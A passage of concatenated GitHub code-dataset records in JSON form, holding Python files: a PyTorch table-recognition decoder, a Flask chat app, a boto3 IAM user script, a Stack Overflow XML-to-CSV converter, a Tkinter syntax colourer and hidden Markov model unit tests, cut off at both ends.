C//self.n_heads).transpose(1,2) # (B, n_heads, T, h_size)\n v = v.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2) # (B, n_heads, T, h_size)\n\n att = q@k.transpose(-2,-1)*(1/math.sqrt(k.size(-1))) # (B, n_heads, N, T)\n att = F.softmax(att, dim=-1) # (B, n_heads, N, T)\n att = self.attn_dropout(att)\n y = att@v # (B, n_heads, N, h_size)\n y = y.transpose(1,2).contiguous().view(B,N,C) #(B, N, n_heads*h_size)\n y = self.resid_dropout(self.c_proj(y))\n return y\n \nclass SelfAttention(nn.Module):\n def __init__(self, config, masked=False, inp=\"tag\"):\n super().__init__()\n self.n_embd = config.n_embd\n self.n_heads = config.n_heads\n if inp == \"tag\":\n self.block_size = config.tags_maxlen\n else:\n self.block_size = config.content_maxlen\n self.c_attn = nn.Linear(self.n_embd, self.n_embd*3, bias=config.bias)\n self.c_proj = nn.Linear(self.n_embd, self.n_embd, bias=config.bias)\n self.mask = torch.tril(torch.ones((self.block_size, self.block_size))).view(1, 1, self.block_size, self.block_size)\n self.attn_dropout = nn.Dropout(config.dropout)\n self.resid_dropout = nn.Dropout(config.dropout)\n self.masked = masked\n\n\n def forward(self, x):\n B, T, C = x.shape #batch_size, block_size, n_embd\n q, k, v = self.c_attn(x).split(self.n_embd, dim=2)\n\n q = q.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2) # (B, n_heads, T, h_size)\n k = k.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2)\n v = v.view(B, T, self.n_heads, C//self.n_heads).transpose(1,2)\n\n att = q@k.transpose(-2,-1)*(1/math.sqrt(k.size(-1))) # (B, n_heads, T, T)\n if self.masked:\n att = att.masked_fill_(self.mask[:, :, :T, :T] == 0, -float('inf'))\n\n att = F.softmax(att, dim=-1)\n att = self.attn_dropout(att)\n y = att@v #(B, n_heads, T, h_size)\n y = y.transpose(1,2).contiguous().view(B,T,C)\n y = self.resid_dropout(self.c_proj(y))\n return y\n\nclass MLP(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.c_fc = nn.Linear(config.n_embd, 4 * config.n_embd, bias=config.bias)\n self.gelu = nn.GELU()\n self.c_proj = nn.Linear(4 * config.n_embd, config.n_embd, bias=config.bias)\n self.dropout = nn.Dropout(config.dropout)\n\n def forward(self, x):\n x = self.c_fc(x)\n x = self.gelu(x)\n x = self.c_proj(x)\n x = self.dropout(x)\n return x\n \nclass DecoderBlock(nn.Module):\n def __init__(self, config, masked=True, inp=\"tag\"):\n super().__init__()\n self.self_attention = SelfAttention(config, masked, inp)\n self.ln_1 = nn.LayerNorm(config.n_embd)\n self.cross_attention = CrossAttention(config)\n self.ln_2 = nn.LayerNorm(config.n_embd)\n self.mlp = MLP(config)\n self.ln_3 = nn.LayerNorm(config.n_embd)\n def forward(self, prev_output, encoder_output):\n x = self.self_attention(prev_output)\n x = self.ln_1(x)\n x = x + self.cross_attention(x, encoder_output)\n x = self.ln_2(x)\n x = x + self.mlp(x)\n x = self.ln_3(x)\n return x\n\nclass EncoderBlock(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.backbone = models.resnet34(pretrained=True)\n self.backbone = nn.Sequential(*list(self.backbone.children())[:-3])\n self.pe = PositionalEncoding(config)\n\n def forward(self, x):\n x = self.backbone(x) #(B, n_emb, H, H)\n x = x.flatten(start_dim=2) #(B, n_emb, H*H)\n x = x.transpose(1,2) #(B, H*H, n_emb)\n outs = self.pe(x) #(B, H*H, n_emb)\n return outs\n \nclass SharedDecoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.emb = nn.Embedding(config.tags_vocab_size, config.n_embd)\n self.pe = PositionalEncoding(config)\n self.decoders = nn.ModuleList([DecoderBlock(config, masked=True, inp=\"tag\")] + \\\n [DecoderBlock(config, masked=False, inp=\"tag\")]*(config.n_decoder_blocks - 1))\n\n def forward(self, x, encoder_output):\n x = x.to(torch.int64)\n x = self.emb(x) # B, tags_maxlen, n_emb\n x = self.pe(x)\n for layer in self.decoders:\n x = layer(x, encoder_output)\n return x\n \nclass StructureDecoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.decoders = nn.ModuleList([DecoderBlock(config, masked=False)]*config.n_decoder_blocks)\n self.fc_out = nn.Linear(config.n_embd, config.tags_vocab_size)\n self.dropout = nn.Dropout(config.dropout)\n\n def forward(self, x, encoder_output):\n for layer in self.decoders:\n x = layer(x, encoder_output)\n x = self.fc_out(x)\n x = self.dropout(x)\n return x\n \nclass BBoxDecoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.decoders = nn.ModuleList([DecoderBlock(config, masked=False)]*config.n_decoder_blocks)\n self.fc_out = nn.Linear(config.n_embd, 4)\n self.dropout = nn.Dropout(config.dropout)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x, encoder_output):\n for layer in self.decoders:\n x = layer(x, encoder_output)\n x = self.fc_out(x)\n x = self.dropout(x)\n outs = self.sigmoid(x)\n return outs\n\nclass ContentDecoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.n_embd = config.n_embd\n self.emb = nn.Embedding(config.content_vocab_size, self.n_embd)\n self.pe = PositionalEncoding(config)\n self.decoders = nn.ModuleList([DecoderBlock(config, masked=True, inp=\"content\")] + \\\n [DecoderBlock(config, masked=False)]*(config.n_decoder_blocks - 1))\n self.fc_out = nn.Linear(config.n_embd, config.content_vocab_size)\n self.dropout = nn.Dropout(config.dropout)\n\n def forward(self, x, encoder_output, decoder_output):\n B, tags_maxlen, content_maxlen = x.shape # B, tags_maxlen, content_maxlen\n x = x.reshape(B*tags_maxlen, content_maxlen) # B*tags_maxlen, content_maxlen\n x = x.to(torch.int64)\n x = self.emb(x).float() # B*tags_maxlen, content_maxlen, n_emb\n x = self.pe(x)\n x += decoder_output.unsqueeze(2).repeat(1,1,content_maxlen,1).view(B*tags_maxlen, content_maxlen, self.n_embd)\n encoder_output = encoder_output.unsqueeze(1).repeat(1,tags_maxlen,1,1).view(B*tags_maxlen, encoder_output.shape[1], self.n_embd)\n\n for layer in self.decoders:\n x = layer(x, encoder_output)\n\n x = self.fc_out(x)\n x = self.dropout(x)\n\n return x.view(B, content_maxlen, tags_maxlen, x.shape[-1]).transpose(1,2)\n","repo_name":"nguyenhoanganh2002/Table-Recognition-base-on-Transformer-Decoder","sub_path":"sub_modules.py","file_name":"sub_modules.py","file_ext":"py","file_size_in_byte":23416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17078639132","text":"import os\n\nfrom flask import Flask, session, request, render_template, redirect, jsonify\nfrom flask_session import Session\nfrom flask_socketio import SocketIO, emit\nimport datetime\n\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\nsocketio = SocketIO(app)\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\nchannel_list = []\nuser_list = []\nchannel_messages = {}\n\n@app.route(\"/logout\")\ndef logout():\n session.clear()\n return redirect(\"/\")\n\n@socketio.on(\"send message\")\ndef mess(data):\n tstamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M')\n message = data[\"message\"]\n user = data[\"user\"]\n # Make dictionary(for now only message content, then add user id)\n message_dict = {\"content\": message, \"user\": user, \"timestamp\": tstamp}\n channel = data[\"channel\"]\n # add message (and drop one message if more than 100):\n if len(channel_messages[channel]) > 100:\n del channel_messages[channel][0]\n channel_messages[channel].append(message_dict)\n emit(\"receive message\", {\"message\": message, \"user\": user, \"timestamp\": tstamp}, broadcast=True)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n\n if session.get(\"user_id\") is not None and session.get(\"channel\") is not None:\n chanName = session.get(\"channel\")\n return redirect(f\"/channel/{chanName}\")\n\n # delete channel in session if exists\n session.pop(\"channel\", None)\n\n if request.method == 'GET':\n if session.get(\"user_id\") is not None:\n return render_template(\"welcome.html\", uname = session['user_id'], channels = channel_list)\n return render_template(\"index.html\", channels = channel_list)\n\n if request.method == 'POST':\n # Add something to prevent sending an empty name\n name = request.form.get(\"uname\")\n session['user_id'] = name\n user_list.append(name)\n return render_template(\"welcome.html\", uname = name, channels = channel_list)\n\n@app.route('/handle_channel', methods=['POST'])\ndef handle_channel():\n chanName = request.form.get(\"channame\")\n channel_list.append(chanName)\n channel_messages[chanName] = []\n return redirect(f\"/channel/{chanName}\")\n\n@app.route(\"/channel/\")\ndef channelContent(channame):\n if session.get(\"user_id\") is None:\n return redirect(\"/\")\n\n # set channnel name\n session['channel'] = channame\n\n return render_template(\"channel.html\", channel = channame, channels = channel_list,\n messages = channel_messages[channame])\n\n@app.route(\"/message_list\", methods=[\"POST\"])\ndef message_list():\n\n # Channel we need message list for\n channel = request.form.get(\"channel\")\n return jsonify({\"messages\": channel_messages[channel]})\n #return jsonify({\"messages\": \"hello\"})\n","repo_name":"lrnzfontana/CS50_WebPr_P2","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35356546133","text":"from flask import jsonify, request\n\n\nclass Response:\n @classmethod\n def success(cls, status, data, status_code=200, message=None):\n response_dict = {\n 'status': status,\n 'data': data,\n 'request_id': request.environ.get('HTTP_X_REQUEST_ID', 'NA')\n }\n if message:\n response_dict['message'] = message\n return jsonify(response_dict), status_code\n\n @classmethod\n def error(cls, error_code, message, status_code=500):\n response_dict = {\n 'status': 'error',\n 'error': message,\n 'error_code': error_code,\n 'request_id': request.environ.get('HTTP_X_REQUEST_ID', 'NA')\n }\n return jsonify(response_dict), status_code\n","repo_name":"akshayanagaraj/askanyone-backend","sub_path":"service/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7962689034","text":"import boto3 #for connecting to aws\n\nclient = boto3.client('iam') #what service so we want ot communicate with\n\n#if we want to creat many things in a file eg ec2 with iam, we rename our variable to \n# iam_client = client = boto3.client('iam')\n#print(dir(client)) #to see the actions we can do with iam using boto3 client\nresponse = client.create_user( #what do we want to do with iam (create)... response can be anything\n UserName=\"bako_python\"\n)\n\nprint(response)","repo_name":"tisanbako/python-project","sub_path":"Tisan-AWS-Automation/1c-creat_iam_user.py","file_name":"1c-creat_iam_user.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24385873484","text":"from threading import Thread\nfrom tkinter import END\nfrom copy import deepcopy\nfrom re import finditer\nfrom re import search\nfrom time import time\n\n\nclass Colorir():\n def __init__(self, master, dic_comandos): \n self.__tx_editor_codigo = None\n self.__historico_coloracao = []\n self.__lista_todos_coloracao = []\n\n self.master = master\n self.dic_comandos = dic_comandos\n self.cor_do_comando = None\n\n def alterar_cor_comando(self, novo_cor_do_comando):\n self.cor_do_comando = novo_cor_do_comando\n\n def __realiza_coloracao(self, palavra, linha, valor1, valor2, cor):\n linha1 = '{}.{}'.format(linha, valor1)\n linha2 = '{}.{}'.format(linha, valor2)\n\n self.__tx_editor_codigo.tag_add(palavra, linha1, linha2)\n self.__tx_editor_codigo.tag_config(palavra, foreground=cor)\n\n def __marcar_coloracao(self, regex, lista, linha, palavra, cor):\n\n for valor in finditer(regex, lista[linha]):\n\n inici_regex = valor.start()\n final_regex = valor.end()\n\n usado = cor + str(palavra) + str(regex) + str(inici_regex) + str(final_regex) + str(linha+1)\n\n self.__historico_coloracao.append(usado)\n Colorir.__realiza_coloracao(self, str(usado), str(linha + 1), inici_regex, final_regex, cor)\n\n if usado not in self.__lista_todos_coloracao:\n self.__lista_todos_coloracao.append(usado)\n\n def __filtrar_palavras(palavra):\n palavra_comando = palavra.replace('+', '\\\\+')\n palavra_comando = palavra_comando.replace('/', '\\\\/')\n palavra_comando = palavra_comando.replace('*', '\\\\*')\n palavra_comando = palavra_comando.replace(' ', '[\\\\s{1,}|_]')\n return palavra_comando\n\n def __colorir_comandos(self, lista_linhas):\n\n # Obtem uma cópia do código para análise mais rápida do interpretador\n texto = \"\"\n for linha in lista_linhas:\n texto += linha\n texto = texto.replace(' ', '')\n texto = texto.lower()\n texto = texto.replace('_', '')\n\n for chave_comando, dicionario_comandos in self.dic_comandos.items():\n cor = self.cor_do_comando[dicionario_comandos[\"cor\"]][\"foreground\"]\n\n for comando in dicionario_comandos[\"comando\"]:\n\n palavra_analise = comando[0].strip()\n\n if palavra_analise == \"\":\n continue\n\n # Verifica se o comando está no código\n comando_teste = palavra_analise.replace(' ', '')\n if comando_teste not in texto:\n continue\n\n palavra_comando = Colorir.__filtrar_palavras(palavra_analise)\n\n regex = '(^|\\\\s){}(\\\\s|$)'.format(palavra_comando)\n\n for linha in range(len(lista_linhas)):\n Colorir.__marcar_coloracao(self, regex, lista_linhas, linha, palavra_comando, cor)\n\n def __colorir_especial(self, lista):\n\n for linha in range(len(lista)):\n\n regex_comentario = '(#|\\\\/\\\\/).*$'\n regex_numerico = '(^|\\\\s|\\\\,)([0-9\\\\.]\\\\s*){1,}($|\\\\s|\\\\,)'\n regex_string = \"\"\"\\\"[^\"]*\\\"\"\"\"\n regex_chave = \"{|}\"\n regex_cor = \"na\\\\s*cor\\\\s*\\\"(.*?)\\\"\"\n\n cor_comentario = self.cor_do_comando[\"comentario\"][\"foreground\"]\n cor_numerico = self.cor_do_comando[\"numerico\"][\"foreground\"]\n cor_chave = self.cor_do_comando[\"logico\"][\"foreground\"]\n cor_string = self.cor_do_comando[\"string\"][\"foreground\"]\n\n cor_cor = search(regex_cor, str(lista[linha]))\n\n Colorir.__marcar_coloracao(self, regex_numerico, lista, linha, 'numerico', cor_numerico)\n Colorir.__marcar_coloracao(self, regex_chave, lista, linha, 'chave', cor_chave)\n Colorir.__marcar_coloracao(self, regex_string, lista, linha, '\"', cor_string)\n\n if \"#\" in lista[linha]:\n Colorir.__marcar_coloracao(self, regex_comentario, lista, linha, 'comentario', cor_comentario)\n\n if cor_cor is not None:\n cor_cor = str(cor_cor.group(1))\n Colorir.__marcar_coloracao(self, regex_cor, lista, linha, 'corcor', cor_cor)\n\n\n def coordena_coloracao(self, event, tx_editor_codigo):\n self.__tx_editor_codigo = tx_editor_codigo\n\n lista_linhas = self.__tx_editor_codigo.get(1.0, END).lower().split('\\n')\n\n self.__historico_coloracao = []\n\n Colorir.__colorir_comandos(self, lista_linhas)\n Colorir.__colorir_especial(self, lista_linhas)\n\n for palavra_nao_colorida in self.__lista_todos_coloracao:\n if palavra_nao_colorida not in self.__historico_coloracao:\n self.__tx_editor_codigo.tag_delete(palavra_nao_colorida)\n self.__lista_todos_coloracao.remove(palavra_nao_colorida)\n\n if self.master is not None:\n self.master.update()\n\n return 0\n","repo_name":"gabrielogregorio/safira","sub_path":"telas/Colorir.py","file_name":"Colorir.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"pt","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"23531314198","text":"#!/usr/bin/env python3\n\n\"\"\"\nso_xml2csv.py - Converts stackoverflow xml dump data to csv format\nAuthor: Jonas Gorauskas\nCreated: 2014-09-01 13:53:06\nModified: 2014-09-01 17:21:37\nDescription:\n\nThis script converts stackoverflow xml dump data to csv format for the purposes\nof easy insertion into a SQL database such as Postgreql.\n\nHistory:\n\n 2014-09-01 13:53:06 - JGG\n Initial commit\n\n 2014-09-01 17:11:48 - JGG\n Change xml parsing strategy:\n - use the c implementation of ElementTree\n - use a generator function\n\n 2014-09-01 17:21:05 - JGG\n Adding function to escape html into a safe string for DB\n\n\"\"\"\n\nimport xml.etree.cElementTree as etree\nimport argparse\nimport time\nimport html\n\n\nclass Timer:\n def __enter__(self):\n self.start = time.clock()\n return self\n\n def __exit__(self, *args):\n self.end = time.clock()\n self.interval = self.end - self.start\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-V', '--version',\n action='version',\n version='%(prog)s 0.1.0 - written by Jonas Gorauskas')\n parser.add_argument('-i', '--input', required=True, dest='input_file',\n help='The input file to be processed')\n parser.add_argument('-o', '--output', required=True, dest='output_file',\n help='The output file to save results to')\n parser.add_argument('-c', '--columns', required=True, dest='columns',\n help='A comma delimited string denoting column order')\n\n return parser.parse_args()\n\n\ndef get_data(fn, columns):\n cols = columns.split(',')\n res = ''\n\n for col in cols:\n res = res + col + ','\n\n res = res[:-1] + '\\n'\n yield res\n\n for evt, row in etree.iterparse(fn):\n res = ''\n if row.tag == 'row':\n for col in cols:\n if col in row.attrib:\n if row.attrib[col].isnumeric():\n res = res + row.attrib[col] + ','\n else:\n res = res + '\"' + escape_str(row.attrib[col]) + '\",'\n else:\n res = res + ','\n res = res[:-1] + '\\n'\n yield res\n row.clear()\n\n\ndef save_data(fn, data):\n with open(fn, 'w') as f:\n for row in data:\n f.write(row)\n\n\ndef escape_str(html_str):\n s = html.escape(html_str)\n return s.replace('\\n', ' ')\n\n\ndef main():\n args = parse_args()\n with Timer() as t:\n data = get_data(args.input_file, args.columns)\n save_data(args.output_file, data)\n print('Done! Work took %.03f secs...' % t.interval)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lolsadeq/Hacks","sub_path":"python/so_xml2csv.py","file_name":"so_xml2csv.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74782005285","text":"import unittest\nimport os\nfrom numpy import array, allclose, zeros, take\nimport logilab.hmm.hmm as hmm\nimport logilab.hmm.hmmc as hmmc\nimport logilab.hmm.hmmf as hmmf\nimport logilab.hmm.hmmS as hmmS\n\nclass TestInitProba(unittest.TestCase):\n \"\"\" test random functions\"\"\"\n hmmKlass = hmm.HMM\n\n def setUp(self):\n self.hmm = self.hmmKlass(['a', 'b'], ['1', '2'], None,\n None, None)\n def test_random_1_1(self):\n self.hmm.set_random_transition_proba()\n self.hmm.checkHMM()\n\n def test_random_1_2(self):\n self.hmm.set_random_observation_proba()\n self.hmm.checkHMM()\n\n def test_random_1_3(self):\n self.hmm.set_random_initial_proba()\n self.hmm.checkHMM()\n\n\n def test_random_1(self):\n self.hmm.set_random_proba()\n self.hmm.checkHMM()\n\n def testr_andom_2(self):\n self.hmm.reset_transition_proba()\n self.failUnless(allclose(self.hmm.A, zeros((2, 2), float)))\n self.hmm.set_transition_proba('a', 'b', 1 )\n self.hmm.set_transition_proba('b', 'a', 1 )\n self.hmm.checkHMM()\n\n def test_random_3(self):\n self.hmm.reset_observation_proba()\n self.failUnless(allclose(self.hmm.B, zeros((2, 2), float)))\n self.hmm.set_observation_proba('a', '1', 1)\n self.hmm.set_observation_proba('b', '1', 1)\n self.hmm.checkHMM()\n\n def test_random_4(self):\n self.hmm.reset_initial_proba()\n self.failUnless(allclose(self.hmm.pi, zeros(2, float)))\n self.hmm.set_initial_proba('a', 0.5)\n self.hmm.set_initial_proba('b' , 0.5)\n self.hmm.checkHMM()\n\nclass TestInitProbaC(TestInitProba):\n hmmKlass = hmmc.HMM_C\n\nclass TestInitProbaF(TestInitProba):\n hmmKlass = hmmf.HMM_F\n\nclass TestFunctions(unittest.TestCase):\n \n hmmKlass = hmm.HMM\n\n def setUp(self):\n self.observations = ['1', '2', '3']\n self.hmm1 = self.hmmKlass(['a', 'b'], ['1', '2'],\n array([[0.2, 0.8],\n [0.3, 0.7]]),\n array( [[1., 0.2],\n [0., 0.8]] ),\n array([0.3, 0.7]))\n self.hmm2 = self.hmmKlass(['a', 'b'], ['1', '2', '3'],\n array([[1.0, 0.0],\n [0.0, 1.0]]),\n array([[0.5, 0.0],\n [ .5, .5],\n [0.0, 0.5]]),\n array([0.5, 0.5]))\n self.hmm3 = self.hmmKlass(['a', 'b'], ['1', '2'],\n array([[0., 1.],\n [0., 1.]]),\n array( [[1., 0.],\n [0., 1.]] ),\n array([0.5, 0.5]))\n self.hmm4 = self.hmmKlass(['a', 'b'], ['1', '2', '3'])\n \n def test_simulate(self):\n chain = self.hmm1.simulate(3)\n self.assertEquals(len(chain), 3)\n ens = set(chain)\n while ens != set():\n elt = ens.pop()\n self.failUnless( elt in self.hmm1.omega_O)\n\n def test_get_observation_indices(self):\n result = array([0, 1, 2], int)\n obs_ind = self.hmm2. _get_observationIndices(self.observations)\n self.failUnless(allclose(obs_ind, result))\n \n def test_normalize_1(self):\n res_a = array([[0.7, 0.3], [0.8, 0.2]])\n res_b = array([[0.2, 1.], [0.8, 0.]])\n res_pi = array([0.7, 0.3])\n A, B = zeros( (self.hmm1.N, self.hmm1.N), float)\n PI = zeros( self.hmm1.N)\n A, B, PI = self.hmm1.normalize()\n self.failUnless(allclose(A, res_a))\n self.failUnless(allclose(B, res_b))\n self.failUnless(allclose(PI, res_pi))\n \n def test_normalize_2(self):\n res_a = array([[0.7, 0.3], [0.8, 0.2]])\n res_b = array([[0.2, 1.], [0.8, 0.]])\n res_pi = array([0.7, 0.3])\n A, B = zeros( (self.hmm1.N, self.hmm1.N), float)\n PI = zeros( self.hmm1.N)\n P = array([1, 0])\n A, B, PI = self.hmm1.normalize(P)\n self.failUnless(allclose(A, res_a))\n self.failUnless(allclose(B, res_b))\n self.failUnless(allclose(PI, res_pi))\n\n def test_correctm_1( self):\n M = array([[1., 0.], [0., 0.]])\n k = 1\n p = 0.5\n result = array([[1., 0.], [0.5, 0.5]])\n MM = self.hmm3.correct_M(M, k, p)\n self.failUnless( allclose(result, MM))\n\n def test_correctm_2( self):\n M = array([[0., 0.], [0., 0.]])\n k = 1\n p = 0.5\n result = array([[0.5, 0.5], [0.5, 0.5]])\n MM = self.hmm3.correct_M(M, k, p)\n self.failUnless( allclose(result, MM))\n\n def test_alpha_scaled_1(self):\n obs_indices = [0, 1]\n res_alpha = array([[1, 0], [0, 1]])\n res_fact = array([2., 1.])\n Bo = take(self.hmm3.B, obs_indices, 0)\n alpha, fact = self.hmm3.alpha_scaled(self.hmm3.A, Bo, self.hmm3.pi )\n self.failUnless( allclose(alpha, res_alpha))\n self.failUnless( allclose(fact, res_fact))\n\n def test_alpha_scaled_2(self):\n obs_indices = [0, 1, 2]\n res_alpha = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n res_fact = array([3., 3., 3.])\n Bo = take(self.hmm4.B, obs_indices, 0)\n alpha, fact = self.hmm4.alpha_scaled(self.hmm4.A, Bo, self.hmm4.pi )\n self.failUnless( allclose(alpha, res_alpha))\n self.failUnless( allclose(fact, res_fact))\n\n def test_beta_scaled_1(self):\n obs_indices = [0, 1, 1]\n fact = array([2., 1., 1.])\n res_beta = array([[2., 2.], [1., 1.], [1., 1.]])\n Bo = take(self.hmm3.B, obs_indices, 0)\n beta = self.hmm3.beta_scaled(self.hmm3.A, Bo, fact )\n self.failUnless( allclose(beta, res_beta))\n\n def test_beta_scaled_2(self):\n obs_indices = [0, 1, 2]\n fact = array([3., 3., 3.])\n res_beta = array([[3., 3.], [3., 3.], [3., 3.]])\n Bo = take(self.hmm4.B, obs_indices, 0)\n beta = self.hmm4.beta_scaled(self.hmm4.A, Bo, fact )\n self.failUnless( allclose(beta, res_beta))\n\n def test_gamma_1(self):\n res = array([[1, 0], [0, 1], [0, 1]], float)\n obs_indices = [0, 1, 1]\n A = self.hmm3.A\n B = self.hmm3.B\n PI = self.hmm3.pi\n Bo = take(B, obs_indices, 0)\n alpha, scale_factors = self.hmm3.alpha_scaled(A, Bo, PI )\n beta = self.hmm3.beta_scaled( A, Bo, scale_factors )\n gamma = self.hmm3._gamma(alpha, beta, scale_factors)\n self.failUnless(allclose(gamma, res))\n\n def test_gamma_2(self):\n res = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n obs_indices = [0, 1, 2]\n A = self.hmm4.A\n B = self.hmm4.B\n PI = self.hmm4.pi\n Bo = take(B, obs_indices, 0)\n alpha, scale_factors = self.hmm4.alpha_scaled(A, Bo, PI )\n beta = self.hmm4.beta_scaled( A, Bo, scale_factors )\n gamma = self.hmm4._gamma(alpha, beta, scale_factors)\n self.failUnless(allclose(gamma, res))\n\n def test_ksi_1(self):\n obs_indices = [0, 1, 1]\n Bo = take(self.hmm3.B, obs_indices, 0)\n alpha, scale_factors = self.hmm3.alpha_scaled(self.hmm3.A, \n Bo, self.hmm3.pi)\n beta = self.hmm3.beta_scaled( self.hmm3.A, Bo, scale_factors )\n ksy = self.hmm3.ksi( self.hmm3.A, Bo, alpha, beta )\n res_ksi = array([ [[0., 1.], [0., 0.]], [[0., 0.], [0., 1.]]])\n self.failUnless( allclose(ksy, res_ksi))\n\n def test_ksi_2(self):\n obs_indices = [0, 1, 2]\n Bo = take(self.hmm4.B, obs_indices, 0)\n alpha, scale_factors = self.hmm4.alpha_scaled(self.hmm4.A, \n Bo, self.hmm4.pi)\n beta = self.hmm4.beta_scaled( self.hmm4.A, Bo, scale_factors )\n ksy = self.hmm4.ksi( self.hmm4.A, Bo, alpha, beta )\n res_ksi = array([ [[0.25, 0.25], [0.25, 0.25]], \n [[0.25, 0.25], [0.25, 0.25]]])\n self.failUnless( allclose(ksy, res_ksi))\n\n def test_update_iter_gamma_1(self):\n gamma = array([[1., 0.], [0., 1.], [0., 1.]])\n sigma_gamma_A = zeros(2)\n sigma_gamma_B = zeros(2)\n sga = array([1., 1.])\n sgb = array([1., 2.]) \n self.hmm3._update_iter_gamma( gamma, sigma_gamma_A, sigma_gamma_B )\n self.failUnless( allclose(sga, sigma_gamma_A))\n self.failUnless( allclose(sgb, sigma_gamma_B))\n\n def test_update_iter_gamma_2(self):\n gamma = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n sigma_gamma_A = zeros(2)\n sigma_gamma_B = zeros(2)\n sga = array([1., 1.])\n sgb = array([1.5, 1.5]) \n self.hmm4._update_iter_gamma( gamma, sigma_gamma_A, sigma_gamma_B )\n self.failUnless( allclose(sga, sigma_gamma_A))\n self.failUnless( allclose(sgb, sigma_gamma_B))\n\n def test_update_iterb_1(self):\n B = self.hmm3.B\n B_bar = B\n gamma = array([[1., 0.], [0., 1.], [0., 1.]])\n obs_indices = [0, 1, 1]\n self.hmm3.update_iter_B( gamma, obs_indices, B_bar )\n self.failUnless( allclose(B, B_bar))\n\n def test_update_iterb_2(self):\n B_bar = self.hmm4.B\n gamma = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n obs_indices = [0, 1, 2]\n result = array([[5./6, 5./6], [5./6, 5./6], [5./6, 5./6]]) \n self.hmm4.update_iter_B( gamma, obs_indices, B_bar )\n self.failUnless( allclose(result, B_bar))\n\n def test_update_itera_1(self):\n ksi = array([ [[0., 1.], [0., 0.]], [[0., 0.], [0., 1.]] ])\n A_bar = zeros((2, 2))\n resA = array([[0., 1.], [0., 1.]])\n self.hmm3._update_iter_A( ksi, A_bar )\n self.failUnless( allclose(resA, A_bar))\n\n def test_update_itera_2(self):\n ksi = array([ [[0.25, 0.25], [0.25, 0.25]], [[0.25, 0.25], [0.25, 0.25]]])\n A_bar = zeros((2, 2))\n resA = array([[0.5, 0.5], [0.5, 0.5]])\n self.hmm4._update_iter_A( ksi, A_bar )\n self.failUnless( allclose(resA, A_bar))\n\n def test_normalize_itera_1(self):\n A_bar = array([[0., 1.], [0., 1.]])\n sga = array([1., 1.])\n result = A_bar\n self.hmm3._normalize_iter_A(A_bar, sga )\n self.failUnless( allclose(A_bar, result))\n \n def test_normalize_itera_2(self):\n A_bar = array([[0.5, 0.5], [0.5, 0.5]])\n sga = array([1., 1.])\n result = A_bar\n self.hmm4._normalize_iter_A(A_bar, sga )\n self.failUnless( allclose(A_bar, result))\n\n def test_normalizeb_1( self):\n B_bar = array([[1., 0.], [0., 2.]])\n sgb = array([1., 2.])\n result = array([[1., 0.], [0., 1.]])\n self.hmm4.normalize_B(B_bar, sgb)\n self.failUnless(allclose(B_bar, result))\n\n def test_normalizeb_2( self):\n B_bar = array([[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]])\n sgb = array([1.5, 1.5])\n result = array([[1./3, 1./3], [1./3, 1./3], [1./3, 1./3]])\n self.hmm4.normalize_B(B_bar, sgb)\n self.failUnless(allclose(B_bar, result))\n\n def test_stop(self):\n self.hmm3._stop_condition(self.hmm3.A, self.hmm3.pi, self.hmm3.B)\n \n def test_final_step(self):\n obs_indices = [0, 1, 1]\n gamma = array([[1., 0.], [0., 1.], [0., 1]])\n ksi = array([[[0., 1.], [0., 0.]], [[0., 0.], [0., 1.]] ])\n Abar = array([[0., 1.], [0., 1.]])\n Bbar = array([[1., 0.], [0., 1.]])\n pibar = array([1., 0.])\n A , B, PI = self.hmm3._final_step( gamma, ksi, obs_indices )\n self.failUnless( allclose(Abar, A))\n self.failUnless( allclose(Bbar, B))\n self.failUnless( allclose(pibar, PI))\n\nclass TestFunctionsC (TestFunctions):\n hmmKlass = hmmc.HMM_C\n\nclass TestFunctionsF(TestFunctions):\n hmmKlass = hmmf.HMM_F\n\nclass TestWeightingFactor(unittest.TestCase):\n\n hmmKlass = hmm.HMM\n def setUp(self):\n self.hmm1 = self.hmmKlass(['a', 'b'], ['1', '2', '3'],\n array([[0., 1.],\n [1., 0.]]),\n array([[0.5, 0.0],\n [ .5, .5],\n [0.0, 0.5]]),\n array([0.5, 0.5]))\n self.hmm2 = self.hmmKlass(['a', 'b'], ['1', '2'],\n array([[0., 1.],\n [0., 1.]]),\n array( [[1., 0.],\n [0., 1.]] ),\n array([0.5, 0.5]))\n\n def test_Weighting_factor_Pall_1(self):\n set_obs = [['1', '2'], ['2', '2']]\n resP = 1./4\n P = 